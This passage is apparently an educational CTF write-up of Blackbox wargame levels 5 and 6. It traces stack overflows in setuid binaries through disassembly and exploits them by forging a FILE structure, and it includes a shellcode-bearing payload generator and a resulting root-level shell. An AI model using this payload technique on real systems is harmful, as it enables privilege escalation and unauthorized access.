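    """Interpret a 32-bit unsigned displacement as a signed offset."""
    return value - (1 << 32) if value & 0x80000000 else value


for disp in (0xFFFFFBD8, 0xFFFFFBE7, 0xFFFFFFE7, 0xFFFFFFF8):
    print(hex(disp), "-> ebp%+#x" % signed32(disp))
```

The first value is the one used here, 0xfffffbd8, which comes out as ebp-0x428. The others are displacements that show up further down in main.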
We then have:
 804848e: 83 38 01              cmpl   $0x1,(%eax)
 8048491: 7f 27                 jg     80484ba <main+0x76>
Which is just a check that argc is greater than 1, i.e. that there is at least one argument to the program. If there is, we jump to the rest of main, otherwise we get the usage printout and an exit.
Whatever happens in the main flow of main is pretty straightforward:
 80484ba: c7 44 24 04 2f 86 04  movl   $0x804862f,0x4(%esp)    ; "a"
 80484c1: 08 
 80484c2: c7 04 24 31 86 04 08  movl   $0x8048631,(%esp)       ; "temp"
 80484c9: e8 9a fe ff ff        call   8048368 <fopen@plt>
 80484ce: 89 45 f8              mov    %eax,0xfffffff8(%ebp)
This opens the file called temp in append mode, and puts the return value (which is fp) in ebp-0x8.
Next piece of code is:
 80484d1: 8b 95 d8 fb ff ff     mov    0xfffffbd8(%ebp),%edx
 80484d7: 8b 42 04              mov    0x4(%edx),%eax
 80484da: 83 c0 04              add    $0x4,%eax
 80484dd: 8b 00                 mov    (%eax),%eax
 80484df: 89 44 24 04           mov    %eax,0x4(%esp)
Which loads the address of argc to edx, then loads the value stored 4 bytes above that address, which is argv, into eax. This makes eax point to &argv[0], adding 4 to eax will make it point to &argv[1], and dereferencing that pointer will make eax itself point to argv[1]. That address is stored in esp+0x4 which makes it a second argument to a function (which is about to be called):
 80484e3: 8d 85 e7 fb ff ff     lea    0xfffffbe7(%ebp),%eax
 80484e9: 89 04 24              mov    %eax,(%esp)
 80484ec: e8 97 fe ff ff        call   8048388 <strcpy@plt>
This loads the first argument with ebp-0x419, which is just some address within the stack which we can call buf, and then calls strcpy. Effectively, argv[1] is copied into buf, and might I also add that it does so in an unsafe fashion.
What it does next is:
 80484f1: 8b 45 f8              mov    0xfffffff8(%ebp),%eax
 80484f4: 89 44 24 04           mov    %eax,0x4(%esp)
 80484f8: 8d 45 e7              lea    0xffffffe7(%ebp),%eax
 80484fb: 89 04 24              mov    %eax,(%esp)
 80484fe: e8 25 fe ff ff        call   8048328 <fputs@plt>
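That's loading fp as the second argument, and the address ebp-0x19 as the first argument, and calling fputs. Note that ebp-0x19 is not buf itself, but the place where the "no segfault yet" string was copied at the beginning of main, which sits between buf and fp.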
After that, the program just exits with 0:
 8048503: c7 04 24 00 00 00 00  movl   $0x0,(%esp)
 804850a: e8 49 fe ff ff        call   8048358 <exit@plt>
Just to put it all together, here's a picture of the stack-frame:
Well, the only interesting things we can overwrite by exploiting the unsafe strcpy are fp and the return address, but seeing that main never returns, but rather exits, we are only left with fp. Let's work with that.
The only thing for which fp is used, after being returned from fopen, is in fputs, so let's see what happens there. Since the executable is not statically compiled, I will use gdb to disassemble fputs (cropped to the interesting parts only):
level6@blackbox:~$ gdb fsp
...
(gdb) break main
Breakpoint 1 at 0x8048452
(gdb) run
Starting program: /home/level6/fsp 

Breakpoint 1, 0x08048452 in main ()
(gdb) disassemble fputs
Dump of assembler code for function fputs:
0x001b24a0 <fputs+0>:   push   %ebp
0x001b24a1 <fputs+1>:   mov    %esp,%ebp
0x001b24a3 <fputs+3>:   sub    $0x1c,%esp
0x001b24a6 <fputs+6>:   mov    %ebx,0xfffffff4(%ebp)
0x001b24a9 <fputs+9>:   mov    0x8(%ebp),%eax
0x001b24ac <fputs+12>:  call   0x170d10 <free@plt+112>
0x001b24b1 <fputs+17>:  add    $0xd7b43,%ebx
0x001b24b7 <fputs+23>:  mov    %esi,0xfffffff8(%ebp)
0x001b24ba <fputs+26>:  mov    0xc(%ebp),%esi
0x001b24bd <fputs+29>:  mov    %edi,0xfffffffc(%ebp)
0x001b24c0 <fputs+32>:  mov    %eax,(%esp)
0x001b24c3 <fputs+35>:  call   0x1c7e30 <strlen>
0x001b24c8 <fputs+40>:  mov    %eax,0xfffffff0(%ebp)
0x001b24cb <fputs+43>:  mov    (%esi),%eax
0x001b24cd <fputs+45>:  and    $0x8000,%eax
0x001b24d2 <fputs+50>:  test   %ax,%ax
0x001b24d5 <fputs+53>:  jne    0x1b250b <fputs+107>
...
0x001b250b <fputs+107>: cmpb   $0x0,0x46(%esi)
0x001b250f <fputs+111>: je     0x1b2584 <fputs+228>
0x001b2511 <fputs+113>: movsbl 0x46(%esi),%eax
0x001b2515 <fputs+117>: mov    0xfffffff0(%ebp),%edx
0x001b2518 <fputs+120>: mov    0x94(%esi,%eax,1),%eax
0x001b251f <fputs+127>: mov    %edx,0x8(%esp)
0x001b2523 <fputs+131>: mov    0x8(%ebp),%edx
0x001b2526 <fputs+134>: mov    %esi,(%esp)
0x001b2529 <fputs+137>: mov    %edx,0x4(%esp)
0x001b252d <fputs+141>: call   *0x1c(%eax)
...
Let's see what happens here. First, inside the function, the first parameter, the string to print, is at ebp+0x8, and the second, fp, is at ebp+0xc. We don't care about the string, only fp.
So the first thing that happens with fp is:
0x001b24ba <fputs+26>:  mov    0xc(%ebp),%esi
This just stores fp in esi, so we have to keep our eyes open to esi references as well. Next:
0x001b24cb <fputs+43>:  mov    (%esi),%eax
0x001b24cd <fputs+45>:  and    $0x8000,%eax
0x001b24d2 <fputs+50>:  test   %ax,%ax
0x001b24d5 <fputs+53>:  jne    0x1b250b <fputs+107>
This looks familiar from the previous level. It tests whether the first long word in the FILE structure pointed to by fp has a certain flag (0x8000) set. If it is set, the program will move in a direction desirable to us:
0x001b250b <fputs+107>: cmpb   $0x0,0x46(%esi)
0x001b250f <fputs+111>: je     0x1b2584 <fputs+228>
This checks that the 0x46th byte into fp is 0x00, and jumps to some location if it is. We do not want it to jump there, so we will make sure there is something non-zero at that address.
The next piece of code is:
0x001b2511 <fputs+113>: movsbl 0x46(%esi),%eax
0x001b2515 <fputs+117>: mov    0xfffffff0(%ebp),%edx
0x001b2518 <fputs+120>: mov    0x94(%esi,%eax,1),%eax
What happens here is that the byte at fp+0x46 is copied into eax with sign extension (which means that for a byte value below 0x80 the rest of eax will be zeroed out). That value is then used as a byte offset into some table that starts at fp+0x94, and the long word found there is copied to eax.
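Sign extension only zeroes the upper bytes when the top bit of the source byte is clear. A short Python 3 model of movsbl (the function name is just for illustration) shows the difference:

```python
def movsbl(byte):
    """Sign-extend one byte to 32 bits, the way movsbl does."""
    return byte | 0xFFFFFF00 if byte & 0x80 else byte


print(hex(movsbl(0x01)))  # 0x1
print(hex(movsbl(0x80)))  # 0xffffff80
```

So a small positive byte at fp+0x46 keeps the table lookup close to fp+0x94, while a byte of 0x80 or above would make the lookup land below it.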
Let's see what happens next:
0x001b251f <fputs+127>: mov    %edx,0x8(%esp)
0x001b2523 <fputs+131>: mov    0x8(%ebp),%edx
0x001b2526 <fputs+134>: mov    %esi,(%esp)
0x001b2529 <fputs+137>: mov    %edx,0x4(%esp)
0x001b252d <fputs+141>: call   *0x1c(%eax)
This piece of code sets up the function arguments, but we don't care about them, because what it does next is call the function whose address is stored at eax+0x1c.

It should be clear by this time what we need to do:
  1. Whatever we have in the first argument to the program will be copied into buf.
  2. The beginning of the payload should start with 0x80808080 to make sure we pass the flag check.
  3. The 0x46th byte needs to be something different from 0x00, let's just choose it to be 0x01.
  4. The long word at 0x94+0x01=0x95 should contain a pointer. Let's make it point to 0x95+4=0x99 (just one slot after the current one).
  5. At 0x99+0x1c=0xb5 we should have another pointer to 0xb5+4=0xb9.
  6. Then we insert the shellcode.
  7. Then there should be some filler which will complete the payload to 0x411 bytes.
  8. The last 4 bytes will overwrite fp and so they should be the address of the bottom of buf.
Or, better put in a diagram:
All that's left now is to discover ebp so we can fill that structure up. Remember that the payload is 0x411+4=0x415 bytes long:
level6@blackbox:~$ gdb fsp
...

(gdb) break main
Breakpoint 1 at 0x8048452
(gdb) run `python -c "print 'a'*0x415"`
Starting program: /home/level6/fsp `python -c "print 'a'*0x415"`

Breakpoint 1, 0x08048452 in main ()
(gdb) p $ebp
$1 = (void *) 0xbfffd678
And write some script to generate the payload:
level6@blackbox:/tmp$ cd /tmp
level6@blackbox:/tmp$ cat > genpayload.py
import struct
EBP = 0xbfffd678
BUF = EBP - 0x419
PTR1 = BUF + 0x99
PTR2 = BUF + 0xb9
SHELLCODE = "31c050682f2f7368682f62696e89e3505389e131d2b00bcd80".decode("hex")

FILE = ""
FILE += struct.pack("<L", 0x80808080)
FILE += '\x90' * (0x46 - 4)
FILE += "\x01"
FILE += '\x90' * (0x95 - 0x47)
FILE += struct.pack("<L", PTR1)
FILE += '\x90' * (0xb5 - 0x99)
FILE += struct.pack("<L", PTR2)
FILE += SHELLCODE
FILE += '\x90' * (0x419 - 8 - len(FILE))
FILE += struct.pack("<L", BUF)

print FILE
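The fake FILE layout can be checked offline by replaying the pointer chase that fputs performs. The following Python 3 sketch rebuilds the interesting part of the payload and follows the same steps as the disassembly: flag test, byte at 0x46, table lookup at 0x94, indirect call through offset 0x1c. The function names are made up, and the model only covers the instructions shown in this post:

```python
import struct

EBP = 0xBFFFD678
BUF = EBP - 0x419
SHELLCODE_OFF = 0xB9  # offset of the shellcode inside the payload


def build_fake_file():
    data = struct.pack("<L", 0x80808080)            # flags, 0x8000 bit set
    data += b"\x90" * (0x46 - len(data))
    data += b"\x01"                                 # non-zero byte at 0x46
    data += b"\x90" * (0x95 - len(data))
    data += struct.pack("<L", BUF + 0x99)           # table entry at 0x94+1
    data += b"\x90" * (0xB5 - len(data))
    data += struct.pack("<L", BUF + SHELLCODE_OFF)  # function pointer slot
    return data


def u32(data, addr):
    """Read a little-endian long word at an absolute stack address."""
    return struct.unpack_from("<L", data, addr - BUF)[0]


def fputs_call_target(data, fp):
    """Follow the checks in fputs and return the address it would call."""
    if not u32(data, fp) & 0x8000:        # and $0x8000 ; jne
        return None
    index = data[fp + 0x46 - BUF]         # cmpb $0x0,0x46(%esi)
    if index == 0:
        return None
    if index & 0x80:                      # movsbl sign extension
        index -= 0x100
    eax = u32(data, fp + 0x94 + index)    # mov 0x94(%esi,%eax,1),%eax
    return u32(data, eax + 0x1C)          # call *0x1c(%eax)


target = fputs_call_target(build_fake_file(), BUF)
print(hex(target - BUF))  # 0xb9
```

If the chase ends at offset 0xb9, fputs will jump straight into the shellcode.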
Let's give it a shot:
level6@blackbox:~$ ~/fsp `python /tmp/genpayload.py`
sh-3.1$ cat /home/level7/password
cat: /home/level7/password: No such file or directory
sh-3.1$ cat /home/level7/passwd
??????????
Done!

Wednesday, January 25, 2012

Blackbox - chapter 5


As in the previous posts, the password for the next level has been replaced with question marks so as to not make this too obvious, and so that the point of the walkthrough, which is mainly educational, will not be missed.

Also, make sure you notice this SPOILER ALERT! If you want to try and solve the level by yourself then read no further!

Hello again. Make sure you are comfortable, because this is going to be a somewhat long level, and rather more difficult than what we saw so far.
First order of business, login & ls:
$ ssh -p 2225 level5@blackbox.smashthestack.org
level5@blackbox.smashthestack.org's password:
...
level5@blackbox:~$ ls -l
total 560
-rwsr-xr-x 1 level6 level6 557846 2008-01-12 21:17 list
-rw-r--r-- 1 root   level5    475 2007-12-29 14:10 list.c
-rw-r--r-- 1 root   level5     10 2007-12-29 14:10 password

And now we take a look at the source file:
level5@blackbox:~$ cat list.c 
#include <stdio.h>


int main(int argc, char **argv)
{
    char buf[100];
    size_t len;
    char fixedbuf[10240];
    FILE *fh;
    char *ptr = fixedbuf;
    int i;

    fh = fopen("somefile", "r");
    if(!fh)
        return 0;

    while((len = fread(buf, 1, 100, fh)) > 0) {
        for(i = 0; i < len; i++) {
            // Disable output modifiers
            switch(buf[i]) {
            case 0xFF:
            case 0x00:
            case 0x01:
                break;
            default:
                *ptr = buf[i];
                ptr++;
            }
        }
    }
    printf("%s", fixedbuf);

    fclose(fh);
}
The program seems to open some fixed file from the current path (which means that we will have to generate that "somefile" file under /tmp). It then proceeds to read chunks of 100 bytes from the file into a temporary buffer, and copies them to a bigger buffer while filtering out specific byte values.
The contents of the big buffer are then printed out to us.

Well, our attack surface is obviously the file somefile. We can also notice that if somefile is longer than 10240 bytes, the read-chunk-and-copy loop will happily continue its business, whereby it will probably mess up the stack.
So let's try and see what the stack frame looks like. And the way to do that is to look at the disassembly of main:
level5@blackbox:~$ objdump -d list|grep -A65 "<main>:"
08048208 <main>:
 8048208: 8d 4c 24 04           lea    0x4(%esp),%ecx
 804820c: 83 e4 f0              and    $0xfffffff0,%esp
 804820f: ff 71 fc              pushl  0xfffffffc(%ecx)
 8048212: 55                    push   %ebp
 8048213: 89 e5                 mov    %esp,%ebp
 8048215: 51                    push   %ecx
 8048216: 81 ec 94 28 00 00     sub    $0x2894,%esp
 804821c: 8d 85 88 d7 ff ff     lea    0xffffd788(%ebp),%eax
 8048222: 89 45 f4              mov    %eax,0xfffffff4(%ebp)
 8048225: c7 44 24 04 88 32 0a  movl   $0x80a3288,0x4(%esp)
 804822c: 08 
 804822d: c7 04 24 8a 32 0a 08  movl   $0x80a328a,(%esp)
 8048234: e8 57 af 00 00        call   8053190 <_IO_new_fopen>
 8048239: 89 45 f0              mov    %eax,0xfffffff0(%ebp)
 804823c: 83 7d f0 00           cmpl   $0x0,0xfffffff0(%ebp)
 8048240: 75 43                 jne    8048285 <main+0x7d>
 8048242: c7 85 78 d7 ff ff 00  movl   $0x0,0xffffd778(%ebp)
 8048249: 00 00 00 
 804824c: e9 8f 00 00 00        jmp    80482e0 <main+0xd8>
 8048251: c7 45 f8 00 00 00 00  movl   $0x0,0xfffffff8(%ebp)
 8048258: eb 23                 jmp    804827d <main+0x75>
 804825a: 8b 45 f8              mov    0xfffffff8(%ebp),%eax
 804825d: 0f b6 44 05 88        movzbl 0xffffff88(%ebp,%eax,1),%eax
 8048262: fe c0                 inc    %al
 8048264: 3c 02                 cmp    $0x2,%al
 8048266: 77 02                 ja     804826a <main+0x62>
 8048268: eb 10                 jmp    804827a <main+0x72>
 804826a: 8b 45 f8              mov    0xfffffff8(%ebp),%eax
 804826d: 0f b6 54 05 88        movzbl 0xffffff88(%ebp,%eax,1),%edx
 8048272: 8b 45 f4              mov    0xfffffff4(%ebp),%eax
 8048275: 88 10                 mov    %dl,(%eax)
 8048277: ff 45 f4              incl   0xfffffff4(%ebp)
 804827a: ff 45 f8              incl   0xfffffff8(%ebp)
 804827d: 8b 45 f8              mov    0xfffffff8(%ebp),%eax
 8048280: 3b 45 ec              cmp    0xffffffec(%ebp),%eax
 8048283: 72 d5                 jb     804825a <main+0x52>
 8048285: 8b 45 f0              mov    0xfffffff0(%ebp),%eax
 8048288: 89 44 24 0c           mov    %eax,0xc(%esp)
 804828c: c7 44 24 08 64 00 00  movl   $0x64,0x8(%esp)
 8048293: 00 
 8048294: c7 44 24 04 01 00 00  movl   $0x1,0x4(%esp)
 804829b: 00 
 804829c: 8d 45 88              lea    0xffffff88(%ebp),%eax
 804829f: 89 04 24              mov    %eax,(%esp)
 80482a2: e8 09 b0 00 00        call   80532b0 <_IO_fread>
 80482a7: 89 45 ec              mov    %eax,0xffffffec(%ebp)
 80482aa: 83 7d ec 00           cmpl   $0x0,0xffffffec(%ebp)
 80482ae: 0f 95 c0              setne  %al
 80482b1: 84 c0                 test   %al,%al
 80482b3: 75 9c                 jne    8048251 <main+0x49>
 80482b5: 8d 85 88 d7 ff ff     lea    0xffffd788(%ebp),%eax
 80482bb: 89 44 24 04           mov    %eax,0x4(%esp)
 80482bf: c7 04 24 93 32 0a 08  movl   $0x80a3293,(%esp)
 80482c6: e8 e5 ab 00 00        call   8052eb0 <_IO_printf>
 80482cb: 8b 45 f0              mov    0xfffffff0(%ebp),%eax
 80482ce: 89 04 24              mov    %eax,(%esp)
 80482d1: e8 0a ac 00 00        call   8052ee0 <_IO_new_fclose>
 80482d6: c7 85 78 d7 ff ff 00  movl   $0x0,0xffffd778(%ebp)
 80482dd: 00 00 00 
 80482e0: 8b 85 78 d7 ff ff     mov    0xffffd778(%ebp),%eax
 80482e6: 81 c4 94 28 00 00     add    $0x2894,%esp
 80482ec: 59                    pop    %ecx
 80482ed: 5d                    pop    %ebp
 80482ee: 8d 61 fc              lea    0xfffffffc(%ecx),%esp
 80482f1: c3                    ret
Wow, good thing the executable has symbol information, because the way to identify the position of the local variables in the stack is by tracking library function calls.

Let's start with these two lines though:
 804821c: 8d 85 88 d7 ff ff     lea    0xffffd788(%ebp),%eax
 8048222: 89 45 f4              mov    %eax,0xfffffff4(%ebp)
This looks like an address assignment, we have such a line in the C program:
    char *ptr = fixedbuf;
This means that fixedbuf starts at ebp-0x2878, and ptr is stored at ebp-0xc.

Next we have a call to _IO_new_fopen:
 8048225: c7 44 24 04 88 32 0a  movl   $0x80a3288,0x4(%esp)
 804822c: 08 
 804822d: c7 04 24 8a 32 0a 08  movl   $0x80a328a,(%esp)
 8048234: e8 57 af 00 00        call   8053190 <_IO_new_fopen>
 8048239: 89 45 f0              mov    %eax,0xfffffff0(%ebp)
And the output, which is a file pointer, is stored at ebp-0x10, which must be our fh.

Now let's look at the call to _IO_fread:
 8048285: 8b 45 f0              mov    0xfffffff0(%ebp),%eax
 8048288: 89 44 24 0c           mov    %eax,0xc(%esp)
 804828c: c7 44 24 08 64 00 00  movl   $0x64,0x8(%esp)
 8048293: 00 
 8048294: c7 44 24 04 01 00 00  movl   $0x1,0x4(%esp)
 804829b: 00 
 804829c: 8d 45 88              lea    0xffffff88(%ebp),%eax
 804829f: 89 04 24              mov    %eax,(%esp)
 80482a2: e8 09 b0 00 00        call   80532b0 <_IO_fread>
 80482a7: 89 45 ec              mov    %eax,0xffffffec(%ebp)
The first parameter is at the bottom of the stack (at esp), this should be the address of buf, and we can see it is ebp-0x78.
The rest of the parameters are already known to us so I won't stall on them.
What's left in this function call is the return value, which is stored at ebp-0x14 and is our len.

The last local variable is i, we can recognize it as the address that gets loaded with a 0, as we can see in the for loop initialization.
There are actually two such instances. This is the first one:
 8048242: c7 85 78 d7 ff ff 00  movl   $0x0,0xffffd778(%ebp)
Which is the return value of main, as we can see eax is reloaded from that address right before exiting main:
 80482e0: 8b 85 78 d7 ff ff     mov    0xffffd778(%ebp),%eax
 80482e6: 81 c4 94 28 00 00     add    $0x2894,%esp
 80482ec: 59                    pop    %ecx
 80482ed: 5d                    pop    %ebp
 80482ee: 8d 61 fc              lea    0xfffffffc(%ecx),%esp
 80482f1: c3                    ret
The second one is the one that interests us:
 8048251: c7 45 f8 00 00 00 00  movl   $0x0,0xfffffff8(%ebp)
Which means i is stored at ebp-0x8.

Let's summarize it all in one diagram:
[Figure: stack frame of main]
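The offsets recovered so far can also be tabulated with a few lines of Python. This is only a sketch: the offsets are the ones read from the disassembly above, while the helper name `gaps` is made up for illustration. The gap above each local gives the size of the two buffers; for i the gap also covers the 4 bytes at ebp-0x4, which are not part of i.

```python
# Offsets relative to ebp, taken from the disassembly above.
LOCALS = {
    "fixedbuf": -0x2878,
    "buf": -0x78,
    "len": -0x14,
    "fp": -0x10,
    "ptr": -0xc,
    "i": -0x8,
}

def gaps(offsets):
    """Map each local to the distance up to the next local (or to ebp)."""
    ordered = sorted(offsets.items(), key=lambda item: item[1])
    result = {}
    for idx, (name, off) in enumerate(ordered):
        upper = ordered[idx + 1][1] if idx + 1 < len(ordered) else 0
        result[name] = upper - off
    return result

sizes = gaps(LOCALS)
# Print from the highest address down, the way a stack diagram is usually drawn.
for name, off in sorted(LOCALS.items(), key=lambda item: -item[1]):
    print("ebp-0x%04x  %-8s %5d bytes" % (-off, name, sizes[name]))
```

The two numbers that matter for what follows are the 10240 bytes of fixedbuf and the 100 bytes of buf that sit directly above it.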
Imagine now the following scenario: we have a very big file, and the read-chunk-and-copy loop keeps copying the data from buf into fixedbuf. After 102 of these cycles, ptr points to fixedbuf+10200, that is, buf-40. After the next cycle, ptr points to buf+60. This means that during the following read (the 104th, if I've kept my tally correctly) ptr would end up pointing beyond the stack frame.
Not entirely, though. The copy is not done in one atomic operation; buf is copied to ptr byte by byte, which means that 40 bytes into the 104th cycle, the value of len will change. This affects the flow control of the for-loop, because if we make len smaller than i is in that round, the loop will stop.
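The tally is easy to double-check. The sketch below assumes every fread returns a full 100-byte chunk and that ptr simply advances one byte per copied byte; the function names are invented for this example.

```python
FIXEDBUF_OFF = -0x2878   # fixedbuf, relative to ebp
BUF_OFF = -0x78          # buf, relative to ebp
LEN_OFF = -0x14          # len, relative to ebp
CHUNK = 100              # bytes requested per fread

def ptr_after(cycles):
    """Offset of ptr (relative to ebp) after `cycles` full chunk copies."""
    return FIXEDBUF_OFF + cycles * CHUNK

def first_hit(target_off):
    """Return (cycle, byte index inside that cycle, file offset) of the
    first copied byte that lands on target_off. Cycles count from 1."""
    distance = target_off - FIXEDBUF_OFF
    return distance // CHUNK + 1, distance % CHUNK, distance

print(ptr_after(102) - BUF_OFF)   # ptr relative to buf after 102 cycles
print(ptr_after(103) - BUF_OFF)   # ptr relative to buf after 103 cycles
print(first_hit(LEN_OFF))         # when and where len gets hit
```

The last value also says which byte of the input file lands on the LSB of len: the one at file offset 10340.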
Since x86 is a little-endian machine, the first byte of len to be overwritten is the LSB, so we need to overwrite it in a way that keeps the loop going; anything larger than 101 will do.
Now, remember that not all byte values are allowed, and if we want to reach interesting places in the stack, we are forced to overwrite the rest of len as well. The smallest value we can write is 0x02, which will make len look something like 0x020202?? when we are done with it.
Next comes fp; again, we can't help but overwrite it. Let's leave the discussion about it for later, though.
After that comes ptr, and this is where it gets tricky: we are overwriting the pointer while using it as the pointer to its own individual bytes. Whichever way it goes, once we overwrite the LSB, the pointer will no longer point to itself, so we need to decide where we want it to point. Well, how about skipping over the rest of ptr and continuing at the MSB of i?
Why would we want to do that? Well, remember we put something like 0x020202?? in len? If we set the MSB of i to 0x03, then i will look like 0x03??????, which is bigger than len, so the loop will stop.
Why do we want it to stop now? Well, you see, when the loop on i stops, there will be another call to fread, only now fp is different.
What would happen? Well, let's take a look at that _IO_fread (cropped in favor of readability):
080532b0 <_IO_fread>:
 80532b0: 55                    push   %ebp
 80532b1: 89 e5                 mov    %esp,%ebp
 80532b3: 83 ec 2c              sub    $0x2c,%esp
 80532b6: 89 75 f8              mov    %esi,0xfffffff8(%ebp)
 80532b9: 8b 75 0c              mov    0xc(%ebp),%esi
 80532bc: 89 7d fc              mov    %edi,0xfffffffc(%ebp)
 80532bf: 8b 7d 10              mov    0x10(%ebp),%edi
 80532c2: 89 5d f4              mov    %ebx,0xfffffff4(%ebp)
 80532c5: 0f af f7              imul   %edi,%esi
 80532c8: 85 f6                 test   %esi,%esi
 80532ca: 0f 84 a4 00 00 00     je     8053374 <_IO_fread+0xc4>
 80532d0: 8b 55 14              mov    0x14(%ebp),%edx
 80532d3: c7 45 e0 00 00 00 00  movl   $0x0,0xffffffe0(%ebp)
 80532da: 8b 02                 mov    (%edx),%eax
 80532dc: 25 00 80 00 00        and    $0x8000,%eax
 80532e1: 66 85 c0              test   %ax,%ax
 80532e4: 75 1f                 jne    8053305 <_IO_fread+0x55>
 80532e6: b8 00 00 00 00        mov    $0x0,%eax
 80532eb: 85 c0                 test   %eax,%eax
 80532ed: c7 45 e0 00 00 00 00  movl   $0x0,0xffffffe0(%ebp)
 80532f4: 0f 85 7e 00 00 00     jne    8053378 <_IO_fread+0xc8>
 80532fa: 8b 45 14              mov    0x14(%ebp),%eax
 80532fd: 89 04 24              mov    %eax,(%esp)
 8053300: e8 bb 40 02 00        call   80773c0 <_IO_flockfile>
 8053305: 8b 55 14              mov    0x14(%ebp),%edx
 8053308: 8b 45 08              mov    0x8(%ebp),%eax
 805330b: 89 74 24 08           mov    %esi,0x8(%esp)
 805330f: 89 14 24              mov    %edx,(%esp)
 8053312: 89 44 24 04           mov    %eax,0x4(%esp)
 8053316: e8 b5 38 00 00        call   8056bd0 <_IO_sgetn>
 805331b: 8b 55 14              mov    0x14(%ebp),%edx
 805331e: 89 c3                 mov    %eax,%ebx
 8053320: 8b 02                 mov    (%edx),%eax
 8053322: 25 00 80 00 00        and    $0x8000,%eax
 8053327: 66 85 c0              test   %ax,%ax
 805332a: 74 37                 je     8053363 <_IO_fread+0xb3>
...
First, let's remember what the parameters to _IO_fread are, in what order they sit on the stack, and where we can see them in the disassembly.
Well, the parameters were (starting at the bottom) buf, then the chunk length (1), then the number of chunks (100), and finally fp.
This means that inside _IO_fread, we can find fp at ebp+0x14. Let's see what the function does with it:
 80532d0: 8b 55 14              mov    0x14(%ebp),%edx
 80532d3: c7 45 e0 00 00 00 00  movl   $0x0,0xffffffe0(%ebp)
 80532da: 8b 02                 mov    (%edx),%eax
 80532dc: 25 00 80 00 00        and    $0x8000,%eax
 80532e1: 66 85 c0              test   %ax,%ax
 80532e4: 75 1f                 jne    8053305 <_IO_fread+0x55>
The long word to which fp points is copied into eax and masked with 0x8000; if that bit is set, execution jumps to 0x08053305:
 8053305: 8b 55 14              mov    0x14(%ebp),%edx
 8053308: 8b 45 08              mov    0x8(%ebp),%eax
 805330b: 89 74 24 08           mov    %esi,0x8(%esp)
 805330f: 89 14 24              mov    %edx,(%esp)
 8053312: 89 44 24 04           mov    %eax,0x4(%esp)
 8053316: e8 b5 38 00 00        call   8056bd0 <_IO_sgetn>
This is a call to _IO_sgetn with fp as the first parameter.
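The branch condition is worth a tiny sketch, mostly to see which byte of the file carries the 0x8000 bit on a little-endian machine. The function names and the sample values are made up for illustration; only the mask comes from the disassembly.

```python
import struct

MASK = 0x8000  # the constant _IO_fread ANDs with the first long word of *fp

def takes_branch(first_long):
    """True if the jne at 0x80532e4 is taken, i.e. bit 0x8000 is set."""
    return (first_long & MASK) != 0

def file_bytes(first_long):
    """The four bytes in the order they would appear in the input file."""
    return struct.pack("<L", first_long)

# Hypothetical sample values: one with the bit set, one without.
for value in (0x02028002, 0x02020202):
    print(hex(value), takes_branch(value), file_bytes(value).hex())
```

With the bit set, the 0x80 ends up in the second byte of the long word as stored in the file.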
Fine, let's see what _IO_sgetn does:
08056bd0 <_IO_sgetn>:
 8056bd0: 55                    push   %ebp
 8056bd1: 89 e5                 mov    %esp,%ebp
 8056bd3: 8b 55 08              mov    0x8(%ebp),%edx
 8056bd6: 5d                    pop    %ebp
 8056bd7: 8b 8a 94 00 00 00     mov    0x94(%edx),%ecx
 8056bdd: 8b 49 20              mov    0x20(%ecx),%ecx
 8056be0: ff e1                 jmp    *%ecx
 8056be2: 8d b4 26 00 00 00 00  lea    0x0(%esi),%esi
 8056be9: 8d bc 27 00 00 00 00  lea    0x0(%edi),%edi
In the context of _IO_sgetn, fp is located at ebp+0x8.
Well, there's some pointer magic happening here, after which there is a jump to the location stored in ecx.
Let's try to write it in more readable C notation:
edx = fp;
ecx = *(unsigned long *)(edx + 0x94);
ecx = *(unsigned long *)(ecx + 0x20);
It looks like fp actually points to some structure, which contains pointers to other structures, which contain an address of a handler.
Well, if we can make the program jump to our handler, we can make it execute a shell.
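To make the double dereference concrete, here is a small model of it over a fake memory region. Everything about the region (its base address, its size, the offsets 0x98 and 0xbc chosen for the second structure and the handler) is hypothetical; only the 0x94 and 0x20 displacements come from the disassembly.

```python
import struct

def read_long(mem, base, addr):
    """Read a little-endian 32-bit word at absolute address addr."""
    return struct.unpack_from("<L", mem, addr - base)[0]

def sgetn_target(mem, base, fp):
    """Address the jmp *%ecx in _IO_sgetn would transfer control to."""
    table = read_long(mem, base, fp + 0x94)    # mov 0x94(%edx),%ecx
    return read_long(mem, base, table + 0x20)  # mov 0x20(%ecx),%ecx

# Hypothetical example: a 0x100-byte region mapped at BASE, with fp == BASE.
BASE = 0x10000
mem = bytearray(0x100)
struct.pack_into("<L", mem, 0x94, BASE + 0x98)          # fp+0x94 -> second structure
struct.pack_into("<L", mem, 0x98 + 0x20, BASE + 0xbc)   # second structure+0x20 -> handler
target = sgetn_target(mem, BASE, BASE)
print(hex(target))
```

Whoever controls the bytes fp points to controls both lookups, and therefore the jump target.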

OK then, let's look back and review what we know, and decide on a strategy.
Well, first, we have found a way to overwrite fp, and then stop the loop and make fread run again.
Then we saw that in fread, some address is extracted from fp, and then the program jumps to that address.
I propose then the following strategy:
  1. We overwrite fp with the address of the bottom of fixedbuf.
  2. We prepare the first long word at the bottom of fixedbuf to be something like 0x????80??, so as to steer the execution path in our direction.
  3. 0x94 bytes after the beginning of fixedbuf, we prepare a pointer to another place in fixedbuf. Let's call it ptr1.
  4. 0x20 bytes after ptr1, we will prepare another address which will be the address of our shellcode.
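It should be much easier to understand this as a layout:
  fixedbuf+0x00   0x????80?? (the long word that gets tested against 0x8000)
  fixedbuf+0x94   ptr1, pointing to another place in fixedbuf
  ptr1+0x20       the address of our shellcode
  (elsewhere)     the shellcode itself
This is the structure we need to have in the beginning of our file.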
Assuming we know ebp, the end of the file (meaning, starting from the point at which we overwrite len) should look like this:
  1. First 0x70, just to make sure we keep the for-loop alive.
  2. Then 0x020202, because we have to.
  3. Then we overwrite fp with fixedbuf=ebp-0x2878.
  4. Then we overwrite the LSB of ptr with the low byte of the address of the second-to-most-significant byte of i. That is because after we overwrite the LSB of ptr, ptr gets incremented in the next line of code, which makes it point to the MSB of i.
  5. And then we overwrite the MSB of i with 0x03, which causes the loop to stop and lets the beginning of the file do its magic.
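The five steps above can be traced with a small simulation of the last copy cycle. It rests on several assumptions that are mine, not the program's: the loop body behaves like `*ptr = buf[i]; ptr++;` with ptr, i and len re-read from the stack on every iteration (as unoptimized code would do), the ebp value and the original fp are placeholders, and the last chunk holds 40 filler bytes followed by the 10-byte tail.

```python
import struct

EBP = 0xbffed8f8          # placeholder; any ebp gives the same picture
FIXEDBUF = EBP - 0x2878
BUF, LEN, FP, PTR, I = (EBP - off for off in (0x78, 0x14, 0x10, 0xc, 0x8))

def simulate_last_cycle(chunk, ptr_start=BUF + 60):
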